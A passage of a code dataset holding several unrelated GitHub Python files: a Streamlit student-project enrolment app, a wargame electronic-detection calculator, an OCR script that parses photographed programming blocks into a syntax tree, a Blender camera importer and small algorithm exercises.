else:\n st.error(\"No se ha encontrado el estudiante\")\n option = st.selectbox(\n '**Elige el proyecto**', [\"\"]+projects)\n if option:\n selected_project = projects_collection.find_one({\"projectID\": option})\n project_name = selected_project[\"name\"]\n project_start_date = selected_project[\"startDate\"].strftime(\"%d/%m/%Y\")\n project_end_date = selected_project[\"endDate\"].strftime(\"%d/%m/%Y\")\n\n st.write(\"Nombre: \", project_name)\n st.write(\"Fecha de Inicio: \", project_start_date)\n st.write(\"Fecha de Fin: \", project_end_date)\n\n if st.button('Enviar'):\n if not studentID:\n st.error(\"Por favor escribe la matrícula del estudiante\")\n elif not option:\n st.error(\"Por favor selecciona un proyecto\")\n else: \n existing_record = enrolled_students.find_one({\"studentID\": studentID})\n new_project = projects_collection.find_one({\"projectID\": option})\n\n if existing_record:\n existing_project = projects_collection.find_one({\"projectID\": existing_record[\"projectID\"]})\n start1 = existing_project[\"startDate\"]\n end1 = existing_project[\"endDate\"]\n start2 = new_project[\"startDate\"]\n end2 = new_project[\"endDate\"]\n\n if existing_record and overlap(start1, end1, start2, end2):\n st.error(\"El estudiante ya tiene un proyecto asignado durante este periodo\")\n elif not hasInductionWeek:\n st.error(\"El alumno no cumple con el requisito de semana de inducción\")\n elif new_project[\"quota\"] <= 0:\n st.error(\"El proyecto ha llegado al límite de estudiantes\")\n else:\n st.write('Enviado')\n document = {\n \"studentID\": studentID,\n \"projectID\": option\n }\n enrolled_students.insert_one(document)\n result = projects_collection.update_one(\n {\"projectID\": option},\n {\"$inc\": {\"quota\": -1}}\n )\n with tab2:\n # Create a sample dataframe\n students_data = []\n for student in enrolled_students.find({}, {'_id': 0}):\n students_data.append(student)\n df = pd.DataFrame(students_data)\n df.columns = ['Matrícula', 'Proyecto']\n df.index += 1\n st.table(df[['Matrícula', 'Proyecto']])\n\nelif authentication_status == False:\n st.error('Username/password is incorrect')\nelif authentication_status == None:\n st.warning('Please enter your username and password')","repo_name":"CarlosToapantaN/TI3005B_Frontend","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74012146065","text":"from django.test import TestCase\n\n\n#def counter(func):\n #COUNTER = 0\n #def wrapper():\n #print('Before')\n #nonlocal COUNTER\n #COUNTER +=1\n #print(COUNTER)\n # result = func()\n #print(f\"Resolt:{result}\")\n #print('After')\n #return wrapper\n\n#@counter\n#def foo():\n #return \"None\"\n\n#foo = counter(foo)\n#foo()\n#foo()\n#foo()\n\nclass Solution(object):\n def twoSum(self, nums, target):\n self.nums = list(nums)\n self.target = int(target)\n\n nums2 = []\n for i in nums:\n nums2.append(i)\n chislo = 0\n shechik = 0\n while shechik != target:\n for num in nums2:\n chislo += num\n if chislo > target:\n raznica = chislo - target\n nums2.remove(raznica)\n chislo = 0\n konec_cikla = sum(nums2)\n shechik = konec_cikla\n final = []\n varik = 0\n bukva =0\n for i in nums2:\n if nums[bukva] != i:\n bukva += 1\n varik += 1\n if i in nums:\n plusik = nums.index(i,varik)\n final.append(plusik)\n varik += 1\n continue\n if varik not in nums2:\n break\n return(final)\n\n\nnum = [2,7,11,15]\ntarg = 9\ntest = Solution()\nprint(test.twoSum(num,targ))\n","repo_name":"IgorOkSuhov/Test_Blog_Books","sub_path":"user/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21577359967","text":"from tkinter import Label, Toplevel, Radiobutton, BooleanVar\nfrom tkinter import Entry\nfrom tkinter import Button\nfrom tkinter import END\nfrom tkinter.ttk import Combobox, Checkbutton\nfrom random import randint\n\nclass ElectronicDetection(Toplevel):\n def __init__(self, parent):\n\n super().__init__(parent)\n self.title('Electronic Detection')\n self.geometry(\"280x140+10+10\")\n\n self.side = BooleanVar()\n self.side.set(True)\n\n self.non_allied_r = Radiobutton(self, text='Non-allied', variable=self.side, value=False)\n self.allied_r = Radiobutton(self, text='Allied', variable=self.side, value=True)\n\n self.non_allied_cyber = BooleanVar()\n self.non_allied_cyber.set(False)\n self.non_allied_cyber_chk = Checkbutton(self, text='Non-allied cyberattack', variable=self.non_allied_cyber)\n\n self.allied_cyber = BooleanVar()\n self.allied_cyber.set(False)\n self.allied_cyber_chk = Checkbutton(self, text='Allied cyberattack', variable=self.allied_cyber)\n\n self.result_btn = Button(self, text='Detection', command=self.detection_result)\n self.result_lbl = Label(self, text='Det:')\n self.result_ent = Entry(self, width=5)\n\n self.result_btn.place(x=20, y=70)\n self.result_ent.place(x=60, y=100)\n self.result_lbl.place(x=20, y=100)\n self.non_allied_r.place(x=20, y=20)\n self.allied_r.place(x=20, y=40)\n self.allied_cyber_chk.place(x=110, y=20)\n self.non_allied_cyber_chk.place(x=110, y=40)\n\n def detection_result(self):\n self.result_ent.delete(0, 'end')\n\n d10 = randint(0, 9)\n\n result = '-'\n\n if self.side.get():\n if self.allied_cyber.get():\n d10 -= 2\n if self.non_allied_cyber.get():\n d10 += 2\n if d10 < 5:\n result = 'D'\n else:\n if self.allied_cyber.get():\n d10 += 2\n if self.non_allied_cyber.get():\n d10 -= 2\n if d10 < 3:\n result = 'D'\n\n self.result_ent.insert(END, result)","repo_name":"KordianChi/NextWar_wargame_calculator","sub_path":"electronic_detection.py","file_name":"electronic_detection.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36965695962","text":"import numpy as np \nimport matplotlib.pyplot as plt \nimport cv2 as cv\nimport pytesseract\nimport os\nimport imutils\nimport argparse\nimport tang_module as tg\nfrom anytree import Node, RenderTree\nfrom PIL import Image\n\n# Construct the argument parser and parse the arguments.\nap = argparse.ArgumentParser()\nap.add_argument('-i', '--image', required=True,\n help = \"path to tangible program image\")\nap.add_argument('-p', '--pre', action='store_true',\n help = \"preprocessing and masks generation debug plots\")\nap.add_argument('-o', '--ocr', action='store_true',\n help = \"ocr debug plots\")\nargs = vars(ap.parse_args())\n\n# Load image.\nimage = cv.imread(args['image'])\nif image is None or image.size == 0:\n print('the image cannot be read (because of missing file, \\\nimproper permissions, unsupported or invalid format)')\n exit(0)\n\n#############################################\n# 1. Preparing the image for pre-processing.#\n##############################################\n\n# Resizing image to make processing faster\nratio = image.shape[0] / 500.0\norig = image.copy()\nimage = imutils.resize(image, height = 500)\n\n# In case automatic Perspective transformation fails the user is \n# prompted to select manually the paper's edges.\n# TODO: this doesn't account for user error.\nselection_counter = 0\nmanual_selection = []\n\ndef coordinates(event, x, y, flags, param):\n global selection_counter, screenCnt\n \n if event == cv.EVENT_LBUTTONDOWN and selection_counter < 4:\n cv.circle(image, (x,y), 5, (255,200,0), -1)\n # print(x, y)\n manual_selection.append([[x, y]])\n selection_counter += 1\n \n# Automatic point selection; assumes that the hole A4 paper is \n# visible.\nscreenCnt = tg.find_points(image)\n\n# Manual point selection.\nif len(screenCnt) == 0:\n print('Perspective transformation failed')\n cv.namedWindow('point_selection', cv.WINDOW_NORMAL)\n cv.setMouseCallback('point_selection', coordinates)\n print('Choose paper\\'s edges manually\\npress \\'q\\' to exit.')\n while(True):\n cv.imshow('point_selection', image)\n key = cv.waitKey(1) & 0xFF\n \n if key == ord(\"q\"):\n cv.destroyAllWindows()\n break\n screenCnt = np.array(manual_selection)\n if selection_counter < 4:\n print('You have to select 4 edges')\n exit(0)\n\n# Perspective transformation\nimage = tg.four_point_transform(orig, screenCnt.reshape(4,2)*ratio)\n\n################################################\n# 2. Pre-Processing and block masks generation.#\n################################################\n\n# Color balance \nbalanced_img = tg.white_balance(image)\n\n# Original image to HSV\nhsv_A = cv.cvtColor(balanced_img, cv.COLOR_RGB2HSV)\n\n# Split each chanel\nh,s,v = cv.split(hsv_A)\n\n# Threshold saturation chanel\nret3, th_saturation = cv.threshold(s, 0, 255,\\\n cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n# Dilating thresholded image to remove letters\n# TODO: dilate only per block mask (?) this may also dilate noise\nDILATION_WINDOW_SIZE = 3\nDILATION_ITERATIONS = 5\nEROSION_WINDOW_SIZE = 3\nEROSION_ITERATIONS = 3\n\nkernel = cv.getStructuringElement(cv.MORPH_RECT,\\\n (DILATION_WINDOW_SIZE,DILATION_WINDOW_SIZE))\nth_saturation = cv.dilate(th_saturation, kernel \\\n ,iterations = DILATION_ITERATIONS)\n\n# Erosion to remove noise\nkernel = np.ones((EROSION_WINDOW_SIZE,EROSION_WINDOW_SIZE),np.uint8)\nth_saturation = cv.erode(th_saturation,kernel,\\\n iterations = EROSION_ITERATIONS)\n\n# Using connected components (CC) method to label each block\nnum_labels, labels_im = cv.connectedComponents(th_saturation)\n\n# Plotting general debug images\nif args['pre']:\n fig = plt.figure(figsize=(14,5))\n fig.suptitle('Pre-Processing and block masks generation', \\\n fontsize= 18)\n plt.subplot(1, 4, 1)\n plt.title('Original Image')\n plt.imshow(cv.cvtColor(orig, cv.COLOR_BGR2RGB))\n plt.subplot(1, 4, 2)\n plt.title('Perspective Transformation &\\nColor Balance')\n plt.imshow(cv.cvtColor(balanced_img, cv.COLOR_BGR2RGB))\n plt.subplot(1, 4, 3)\n plt.title('Saturation Chanel')\n plt.imshow(s)\n plt.subplot(1, 4, 4)\n plt.title('Thresholded Saturation Chanel')\n plt.imshow(th_saturation, cmap='gray')\n plt.show()\n\n# Original image to grayscale\ngray_A = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\n# Used for filtering components base on a persentage of the images size\nlow_filter = .0005*np.prod(image.shape) \n\n# Dilation to remove letters from masks.\nMASK_WS = 4\nmask_dilation = cv.getStructuringElement(cv.MORPH_RECT,\\\n (MASK_WS, MASK_WS))\n\ncounter = 0\nprint('Collecting block information')\nfor num in range(1, num_labels):\n\n # Extracting mask from (CC) result\n label = labels_im == num\n block_mask = np.copy(th_saturation)\n block_mask[label == False] = 0\n block_mask[label == True] = 255 \n \n # Filtering features.\n if cv.countNonZero(block_mask) < low_filter:\n continue\n \n # Find coordinates (x, y) and hight - width of the block (h, w) \n # based on the blocks mask\n contours, _ = cv.findContours(block_mask, cv.RETR_TREE, \\\n cv.CHAIN_APPROX_SIMPLE)\n x,y,w,h = cv.boundingRect(contours[0])\n\n # This is the second time this is applied, this time in each \n # individual mask.\n block_mask = cv.dilate(block_mask, mask_dilation,iterations = 3)\n \n # Masking to extract image feature from image.\n feature = cv.bitwise_and(gray_A, gray_A, mask=block_mask) \n\n # Save block information.\n nb = tg.new_block('unprocessed', x, y, w, h, feature)\n counter +=1 \n\nprint('Found {} blocks in image'.format(counter))\nsorted_blocks = sorted(tg.block_list, key=lambda block: block.coord_sum)\n\n# Calculating mean height of blocks to be used to identify control\n# blocks and correctly crop them out of the original image.\nheight_sum = 0\nfor block in sorted_blocks:\n height_sum += block.height\n \nmean_height = height_sum/counter\n\n#############################\n# 3. Preparing text for OCR #\n#############################\n\n# Kernels that will be used in erosion-dilation morphological \n# transformations.\nerosion_kernel = cv.getStructuringElement(cv.MORPH_RECT, (5,5))\ndilation_kernel = cv.getStructuringElement(cv.MORPH_RECT, (2,2))\n\nfor block in sorted_blocks:\n # Cropping each block to help with binarization later\n # Using a temporary cropping solution to crop control blocks. \n\n # TODO: find a better way to crop text of blocks \n # (maybe use image_to_data() from Tesseract).\n \n crop_v = 18\n crop_right = int(.08*block.width)\n if block.height > mean_height or block.height > 150:\n crop_h = int(.58*block.height)\n feature = \\\n block.feature[block.y+crop_v: block.y+block.height-crop_h, \n block.x+crop_v: block.x+block.width-crop_right]\n else:\n feature = \\\n block.feature[block.y+crop_v:block.y+block.height-crop_v, \n block.x+crop_v: block.x+block.width-crop_right]\n \n # Filtering out empty features.\n if feature.size == 0: continue\n\n # Upscale feature image to have more pixels to wor with \n # morphological transformations.\n multiplier = 2\n feature = cv.resize(feature, dsize=(feature.shape[1]*multiplier, \\\n feature.shape[0]*multiplier), interpolation=cv.INTER_CUBIC)\n\n # Blurring to make bin more accurate.\n feature = cv.GaussianBlur(feature,(5,5),0)\n\n # Binarize and invert feature.\n ret3, th_feature = cv.threshold(feature, 0, 255, \\\n cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n # Morphological transformations.\n erosion = cv.erode(th_feature, erosion_kernel, iterations = 1)\n dilation = cv.dilate(erosion, dilation_kernel,iterations = 1)\n inv_feature = np.invert(dilation)\n\n ######################\n # 4. Collecting data #\n ######################\n \n # Tesseract.\n config = '--psm 7'\n tesseract_output = pytesseract.image_to_string(inv_feature, \\\n lang='eng', config=config)\n\n # Remove spaces and newlines.\n text_in_block = ' '.join(tesseract_output.split())\n\n # Match text to expected text.\n if not (tg.similar(text_in_block, 'Variable') > 0.8): \n # Don't compare variable as it is likely to be matched with\n # the wrong text.\n text_in_block = tg.similar_to_exp_text(text_in_block)\n block.set_text(text_in_block)\n else:\n block.set_text(text_in_block)\n\n # Print masking - Tesseract results.\n if args['ocr']:\n fig = plt.figure(figsize=(8,5))\n fig.suptitle('Tesseract results & Block Mask', fontsize=18)\n plt.title('Tesseract & Masking ')\n plt.subplot(1,2,1)\n plt.title('Block\\'s id: {} at ({}, {})\\n Tesseract read: {}'\\\n .format(block.b_id, block.x, block.y,\\\n ' '.join(tesseract_output.split())))\n plt.imshow(inv_feature, cmap='gray')\n plt.subplot(1,2,2)\n plt.title('Block\\'s Mask')\n plt.imshow(block.feature)\n plt.show()\n\n#####################\n# 5. AST generation #\n#####################\n\n# Base anytree library node, used to connect all nodes of the tangible\n# program.\nroot = Node('tangible program')\nprevious_node = root \n\n# Keepig all the blocks that initiate a new nesting level in this list.\nnesting_node_list = []\nNESTING_LIST_INDEX = 0\n\n# Add node on the correct nesting level.\ndef add_node_on_nest_lvl(block):\n if len(nesting_node_list) == 0:\n previous_node = Node(block.text, parent=root)\n else:\n previous_node = Node(block.text, parent=nesting_node_list[-1])\n return previous_node\n\n\ndef get_next_block():\n # Simple function to improve redability below\n # returns the next block in sorted_block list.\n global NESTING_LIST_INDEX\n if NESTING_LIST_INDEX >= len(sorted_blocks):\n return None\n ret = sorted_blocks[NESTING_LIST_INDEX]\n NESTING_LIST_INDEX += 1\n return ret\n\n\nblock_has_attached = False \n# Pointer to correctly connect control blocks that have both attached\n# and blocks underneath them (if-do type of blocks).\nif_do_ind_block = None\ncurrent_block = get_next_block()\nwhile current_block != None:\n\n # Skip all 'unprocessed' blocks, assuming they will be noise.\n if tg.similar(current_block.text, 'unprocessed') > 0.7:\n current_block = get_next_block()\n continue\n \n # 'b_tab' block removes an indentation level.\n if tg.similar(current_block.text, 'b_tab') > 0.7:\n nesting_node_list.pop()\n current_block = get_next_block()\n continue\n \n # Case 1 : Blocks attached to the right of current_block.\n next_block = tg.get_block_attached_to(current_block)\n if next_block != None : \n previous_node = add_node_on_nest_lvl(current_block)\n # Keeping parent information so that we can return to \n # the parent_block once we found all the attached blocks.\n parent_node = previous_node\n parent_block = current_block \n \n # Iterate through attached blocks.\n while next_block != None:\n block_has_attached = True\n previous_node = Node(next_block.text, parent=previous_node)\n current_block = get_next_block()\n next_block = tg.get_block_attached_to(current_block)\n\n # Printing results.\n if block_has_attached:\n block_has_attached = False \n # Using the parent_block variable \n # to continue searching.\n current_block = parent_block \n # Reset tree node to parent node.\n previous_node = parent_node \n current_block = get_next_block()\n\n if tg.is_control_block(parent_block.text): \n # In the current state of the project this is reached\n # by if do.\n if_do_ind_block = tg.get_block_indented_to(parent_block)\n if current_block.b_id == if_do_ind_block.b_id:\n nesting_node_list.append(parent_node)\n continue\n else:\n continue\n \n # Case 2: block has other blocks indented to it.\n next_block = tg.get_block_indented_to(current_block)\n if next_block != None:\n # Add current block to tree (current indentation lvl).\n previous_node = add_node_on_nest_lvl(current_block)\n # Append the current node to the indentation list.\n nesting_node_list.append(previous_node) \n # This is the actual indented node.\n current_block = get_next_block() \n continue\n\n # Case 3: block has other blocks underneath. \n next_block = tg.get_block_underneath(current_block)\n if next_block != None:\n previous_node = add_node_on_nest_lvl(current_block)\n current_block = get_next_block()\n continue\n \nprint('Printing AST...') \ntg.print_AST(root)","repo_name":"VasilisPoulos/tangibles-recognition","sub_path":"tangibles.py","file_name":"tangibles.py","file_ext":"py","file_size_in_byte":12834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71996240466","text":"# Copyright (c) 2016-2019, Thomas Larsson\r\n# All rights reserved.\r\n#\r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n#\r\n# 1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer.\r\n# 2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n#\r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\r\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\r\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# The views and conclusions contained in the software and documentation are those\r\n# of the authors and should not be interpreted as representing official policies,\r\n# either expressed or implied, of the FreeBSD Project.\r\n\r\n\r\nimport bpy\r\nimport math\r\nfrom .node import Node\r\nfrom .settings import theSettings\r\n\r\nclass Camera(Node):\r\n\r\n def __init__(self, fileref):\r\n Node.__init__(self, fileref)\r\n self.perspective = {}\r\n self.orthographic = {}\r\n self.channels = {}\r\n self.aspectRatio = 1.0\r\n\r\n\r\n def __repr__(self):\r\n return (\"\" % (self.id))\r\n\r\n\r\n def parse(self, struct):\r\n Node.parse(self, struct)\r\n if \"perspective\" in struct.keys():\r\n self.perspective = struct[\"perspective\"]\r\n elif \"orthographic\" in struct.keys():\r\n self.orthographic = struct[\"orthographic\"]\r\n if \"extra\" in struct.keys():\r\n for estruct in struct[\"extra\"]:\r\n if estruct[\"type\"] == \"studio_node_channels\":\r\n self.channels = estruct[\"channels\"]\r\n\r\n\r\n def postTransform(self):\r\n from .settings import theSettings\r\n if theSettings.zup:\r\n ob = self.rna\r\n ob.rotation_euler[0] += math.pi/2\r\n\r\n\r\n def build(self, context, inst=None):\r\n if self.perspective:\r\n self.data = bpy.data.cameras.new(self.name)\r\n self.setCameraProps(self.perspective)\r\n elif self.orthographic:\r\n self.data = bpy.data.cameras.new(self.name)\r\n self.setCameraProps(self.orthographic)\r\n else:\r\n return None\r\n #print(\"Camera\", self.data)\r\n self.buildChannels()\r\n Node.build(self, context, inst)\r\n\r\n\r\n def setCameraProps(self, props):\r\n camera = self.data\r\n for key,value in props.items():\r\n #print(\"Camera\", key, value)\r\n if key == \"znear\" :\r\n camera.clip_start = value * theSettings.scale\r\n elif key == \"zfar\" :\r\n camera.clip_end = value * theSettings.scale\r\n elif key == \"yfov\" :\r\n pass\r\n elif key == \"focal_length\" :\r\n camera.lens = value\r\n elif key == \"depth_of_field\" :\r\n pass\r\n elif key == \"focal_distance\" :\r\n self.setFocusDist(camera, value * theSettings.scale * 0.1)\r\n elif key == \"fstop\" :\r\n self.setFStop(camera, value)\r\n else:\r\n print(\"Unknown camera prop: '%s' %s\" % (key, value))\r\n\r\n\r\n def setFocusDist(self, camera, value):\r\n if bpy.app.version < (2,80,0):\r\n camera.dof_distance = value\r\n else:\r\n camera.dof.focus_distance = value\r\n\r\n\r\n def setFStop(self, camera, value):\r\n if bpy.app.version < (2,80,0):\r\n camera.gpu_dof.fstop = value\r\n camera.cycles.aperture_fstop = value\r\n else:\r\n camera.dof.aperture_fstop = value\r\n\r\n\r\n def buildChannels(self):\r\n from .asset import getCurrentValue\r\n from .utils import D\r\n\r\n camera = self.data\r\n camera.sensor_width = 64\r\n for data in self.channels:\r\n channel = data[\"channel\"]\r\n key = channel[\"id\"]\r\n value = channel[\"current_value\"]\r\n if key == \"Lens Shift X\" :\r\n camera.shift_x = value * theSettings.scale\r\n elif key == \"Lens Shift Y\" :\r\n camera.shift_y = value * theSettings.scale\r\n elif key == \"Focal Length\":\r\n camera.lens = value # in mm\r\n elif key == \"Depth of Field\":\r\n self.setFocusDist(camera, value * theSettings.scale * 0.1)\r\n elif key == \"Frame Width\":\r\n pass\r\n #camera.sensor_width = value\r\n #camera.sensor_height = self.aspectRatio * value\r\n elif key == \"Aspect Ratio\":\r\n self.aspectRatio = value[1]/value[0]\r\n #camera.sensor_height = self.aspectRatio * camera.sensor_width\r\n elif key == \"Aperture Blades\":\r\n if bpy.app.version < (2,80,0):\r\n camera.gpu_dof.blades = value\r\n camera.cycles.aperture_blades = value\r\n else:\r\n camera.dof.aperture_blades = value\r\n elif key == \"Aperture Blade Rotation\":\r\n if bpy.app.version < (2,80,0):\r\n camera.cycles.aperture_rotation = value*D\r\n else:\r\n camera.dof.aperture_rotation = value*D\r\n\r\n elif key in [\"Point At\", \"Renderable\", \"Visible\", \"Selectable\", \"Perspective\",\r\n \"Render Priority\", \"Cast Shadows\", \"Pixel Size\",\r\n \"Lens Stereo Offset\", \"Lens Radial Bias\", \"Lens Stereo Offset\",\r\n \"Lens Distortion Type\", \"Lens Distortion K1\", \"Lens Distortion K2\", \"Lens Distortion K3\", \"Lens Distortion Scale\",\r\n \"DOF\", \"Aperature\", \"Disable Transform\", \"Visible in Simulation\",\r\n \"Lens Thickness\", \"Local Dimensions\", \"Dimension Preset\", \"Constrain Proportions\",\r\n \"HeadlampMode\", \"Headlamp Intensity\", \"XHeadlampOffset\", \"YHeadlamp\", \"ZHeadlampOffset\",\r\n \"Display Persistence\", \"Sight Line Opacity\",\r\n \"Focal Point Scale\", \"FOV Color\", \"FOV Opacity\", \"FOV Length\",\r\n \"DOF Plane Visibility\", \"DOF Plane Color\",\r\n \"Visible in Viewport\", \r\n \"DOF Overlay Color\", \"DOF Overlay Opacity\", \"Near DOF Plane Visibility\", \"Far DOF Plane Visibility\",\r\n ]:\r\n #print(\"Unused\", key, value)\r\n pass\r\n else:\r\n print(\"Unknown camera channel '%s' %s\" % (key, value))\r\n","repo_name":"Diffeomorphic/import-daz","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"36444987425","text":"#1\r\nclass Solution(object):\r\n def twoSum(self, nums, target):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type target: int\r\n :rtype: List[int]\r\n \"\"\"\r\n pool={}\r\n for idx,item in enumerate(nums):\r\n residual = target - item\r\n if residual in pool:\r\n res_idx = pool[residual]\r\n return [idx,res_idx] \r\n else:\r\n pool[item]=idx","repo_name":"GuilinZ/leecode","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73906127506","text":"import sys\n\nto_binary = {\"0\": \"000\", \"1\": \"001\", \"2\": \"010\", \"3\": \"011\", \"4\": \"100\",\n \"5\": \"101\", \"6\": \"110\", \"7\": \"111\"}\n\n\ndef main():\n octet = sys.stdin.readline().rstrip()\n answer = \"\"\n\n for i in range(len(octet)):\n answer += to_binary[octet[i]]\n\n if answer[0] == \"0\":\n if answer[1] == \"0\":\n print(answer[2:])\n else:\n print(answer[1:])\n else:\n print(answer)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Kangsan-Jeon/AlgorithmTrain","sub_path":"Baekjoon/수학1/[완]1212_8진수 2진수.py","file_name":"[완]1212_8진수 2진수.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8125816051","text":"from collections import Counter\n\n\nclass Solution(object):\n def maximumTastiness(self, price, k):\n \"\"\"\n :type price: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n price.sort()\n print(price)\n diff = []\n for i in range(1, len(price)):\n diff.append(price[i] - price[i-1])\n print(diff)\n\n\nif __name__ == \"__main__\":\n price = [13,5,1,8,21,2]\n k = 3\n Solution().maximumTastiness(price, k)","repo_name":"YingbingZhu/python_leetcode","sub_path":"array/6270. Take K of Each Character From Left and Right.py","file_name":"6270. Take K of Each Character From Left and Right.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23899201333","text":"n=int(input())\narr=list(map(int,input().split()))\nm=int(input())\nnum=''\nfor elem in arr:\n num+=str(elem)\nfor i in range(0,len(num),m):\n if i+m>len(num):\n print(num[i:len(num)])\n else: \n print(num[i:i+m])\n","repo_name":"KimDongHyun0907/python-study","sub_path":"string_problem/divide_number.py","file_name":"divide_number.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13755055315","text":"import sys\nfrom heapq import heappop, heappush\n\n\ndef solve():\n input = sys.stdin.readline\n N = int(input())\n adj = [[] for _ in range(N)]\n for i in range(N - 1): # dist가 작으면 더 큰것\n u, v, dist = map(int, input().split())\n adj[u - 1].append([v - 1, dist])\n adj[v - 1].append([u - 1, dist])\n\n def dijkstra(start):\n min_heap = [[0, start]]\n visited = [0] * N\n dist = [float('inf') for _ in range(N)]\n dist[start] = 0\n top_dist, top_idx = 0, 0\n while min_heap:\n top_dist, top_idx = heappop(min_heap)\n if (visited[top_idx]):\n continue\n visited[top_idx] = 1\n for i, w in adj[top_idx]:\n if (visited[i] == 0 and top_dist + w < dist[i]):\n dist[i] = top_dist + w\n heappush(min_heap, [dist[i], i])\n return top_dist, top_idx\n\n print(dijkstra(dijkstra(0)[1])[0])\n\n\nsolve()\n","repo_name":"Daejjyu/Algorithm","sub_path":"Jungle/Week3_BFS, DFS, 위상정렬/00_exam_3_1967_트리의 지름.py","file_name":"00_exam_3_1967_트리의 지름.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73169873744","text":"from shapely.geometry import shape, Point\n\ndef load_centroids(db):\n q=f\"select gid,ST_AsGeoJSON(ST_Transform(geom,4326))::json from lsoa;\"\n db.cur.execute(q)\n print(\"executed...\")\n lsoas=[]\n r = db.cur.fetchone()\n while r:\n print(r[0])\n lsoas.append([r[0],shape(r[1]).centroid])\n r = db.cur.fetchone()\n return lsoas\n\ndef lsoa_to_msoa(db):\n db.create_tables({\"hierarchy_lsoa_to_msoa\":\n [[\"msoa\",\"int\"],\n [\"lsoa\",\"int\"]]});\n \n print(\"loading lsoa geom\")\n lsoas = load_centroids(db)\n \n # for each msoa\n q=f\"select gid from msoa;\"\n db.cur.execute(q)\n for msoa_geo_id in db.cur.fetchall():\n q=f\"select ST_AsGeoJSON(ST_Transform(geom,4326))::json from msoa where gid={msoa_geo_id[0]}\"\n db.cur.execute(q)\n msoa_geo = shape(db.cur.fetchone()[0])\n count=0\n for lsoa in lsoas:\n if msoa_geo.contains(lsoa[1]): \n count+=1\n q=f\"insert into hierarchy_lsoa_to_msoa (msoa, lsoa) values ({msoa_geo_id[0]},{lsoa[0]});\"\n db.cur.execute(q)\n print(\"msoa \"+str(msoa_geo_id)+\" has \"+str(count)+\" lsoas inside\")\n db.conn.commit() \n\ndef lsoa_to_counties(db):\n db.create_tables({\"hierarchy_lsoa_to_counties\":\n [[\"county\",\"int\"],\n [\"lsoa\",\"int\"]]});\n \n print(\"loading lsoa geom\")\n lsoas = load_centroids(db)\n \n # for each msoa\n q=f\"select gid from counties;\"\n db.cur.execute(q)\n for county_geo_id in db.cur.fetchall():\n q=f\"select ST_AsGeoJSON(ST_Transform(geom,4326))::json from counties where gid={county_geo_id[0]}\"\n db.cur.execute(q)\n county_geo = shape(db.cur.fetchone()[0])\n count=0\n for lsoa in lsoas:\n if county_geo.contains(lsoa[1]): \n count+=1\n q=f\"insert into hierarchy_lsoa_to_counties (county, lsoa) values ({county_geo_id[0]},{lsoa[0]});\"\n db.cur.execute(q)\n print(\"county \"+str(county_geo_id)+\" has \"+str(count)+\" lsoas inside\")\n db.conn.commit() \n\n","repo_name":"UniExeterRSE/LCAT","sub_path":"data/builder/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41195992712","text":"def main():\r\n\r\n\r\n\tt = int(input())\r\n\r\n\twhile t:\r\n\r\n\t\tn = int(input())\r\n\t\ta = [int(x) for x in input().split()]\r\n\r\n\t\tprev = a[-1]\r\n\r\n\t\tcount = 0\r\n\r\n\t\tfor i in a[n-2::-1]:\r\n\r\n\t\t\tif i > prev:\r\n\r\n\t\t\t\tcount += 